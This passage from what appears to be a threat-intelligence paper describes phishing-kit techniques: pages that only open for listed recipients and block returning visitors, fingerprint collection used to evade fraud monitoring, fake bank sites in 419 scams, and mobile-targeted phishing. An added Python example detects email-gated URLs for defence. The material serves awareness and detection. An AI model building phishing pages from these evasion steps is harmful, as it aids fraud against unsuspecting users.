few more techniques that are available in the phishing arsenal that are not as well known, but are
still out there and are worth noting.
Filtering by Geolocation and Email Address
Some phishing attacks are focused on victims with specific criteria, like geolocation. For instance,
our analysts have witnessed phishing sites that validate their victims by comparing their email
address with a long list of confirmed email addresses for a certain region that the fraudster
obtained earlier. Some phishing emails are sent with email addresses embedded in the URL’s
parameters to make sure that only the people who received the phishing email will be able to
access the fraudulent site.
[Code snapshot annotations: make sure the victim’s email address is set in the “id” parameter,
otherwise the phishing page won’t be shown; check whether the email is in the list; check whether
it is a returning victim; put it in an ignore list to block access a second time; if it passed the
tests, redirect to the phishing page]
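An added Python example (not from this paper) of the corresponding check on the defender’s side: it scans URLs seen at a mail gateway for a query parameter that carries an email address, in plain form or base64-encoded, which marks a link gated to one recipient. The sample URLs, the hosts and the parameter name are constructed.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# Constructed mail-gateway URL samples. The first two carry the recipient in the
# 'id' parameter (plain and base64), the way the gated kit described above expects it.
SAMPLE_URLS = [
    "http://hijacked.example/kit/index.php?id=victim@example.invalid",
    "http://hijacked.example/kit/index.php?id="
    + base64.b64encode(b"victim2@example.invalid").decode(),
    "http://shop.example/cart?item=42&ref=newsletter",
]


def _candidates(value):
    """Yield (encoding, decoded value) pairs worth testing for an email address."""
    yield "plain", value
    # parse_qsl already URL-decoded the value and turned '+' into a space; restore it
    # before base64 decoding, and pad to a multiple of four characters.
    token = value.replace(" ", "+")
    token += "=" * (-len(token) % 4)
    try:
        yield "base64", base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return


def embedded_recipient(url):
    """Return (parameter, email, encoding) when a query parameter carries an email
    address, else None."""
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for encoding, candidate in _candidates(value):
            if EMAIL_RE.match(candidate):
                return name, candidate, encoding
    return None


def gated_links(urls):
    """Filter a batch of URLs down to those that carry an addressed recipient."""
    found = []
    for u in urls:
        hit = embedded_recipient(u)
        if hit:
            found.append((u, hit))
    return found


if __name__ == "__main__":
    for url, hit in gated_links(SAMPLE_URLS):
        print(url, "->", hit)
```

A gated link fetched without the addressed parameter shows nothing, so when such a URL is submitted for analysis or takedown the complete URL, parameter included, has to be preserved.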
Collecting Statistics
Statistics collection is another popular feature fraudsters like to implement in their attacks.
Sometimes it is done using online services, but most of the time this feature is incorporated as
part of the phishing kit. User information such as screen resolution, IP address, language
preferences in the browser, etc. allows fraudsters to mimic a victim’s online “fingerprint” when
trying to log in to their online accounts, avoiding detection by the online-security monitoring
solutions deployed on legitimate websites.
The 419 Scam
The 419 (Nigerian) scam is one of the oldest fraud schemes on the internet. And surprisingly,
enough people still fall victim to this simple and often humorous fictional cover story that
purportedly offers to share millions of dollars with the victim, if only they first provide a small
deposit to start the process… Now, in order to add greater believability or a trust factor to this
scam, fraudsters developed sites that imitate online banking, where the victims are given a set of
prepared account credentials to login. Usually, their name is displayed after they login, and they
can see that there are thousands or millions of dollars in their account. Once they gain this little
measure of the victim’s trust, the rest of the standard 419 scam can be played out more easily.
Smartphones Always At Our Side
We are now living in the ‘smartphone era’, where all sorts of tiny mobile devices with vast
computing and communication abilities are always at our side – fraudsters take into consideration
that victims are now more ‘attached’ to their email than ever before. Many of us check our
messages much more frequently, especially if we have a notification sound set on our device. And
accordingly, more and more fraudsters modify their phishing sites to accommodate mobile
browsers. Therefore, despite the rising awareness of online fraud in the general population and
the media, phishing remains one of the most dangerous cyber-threats.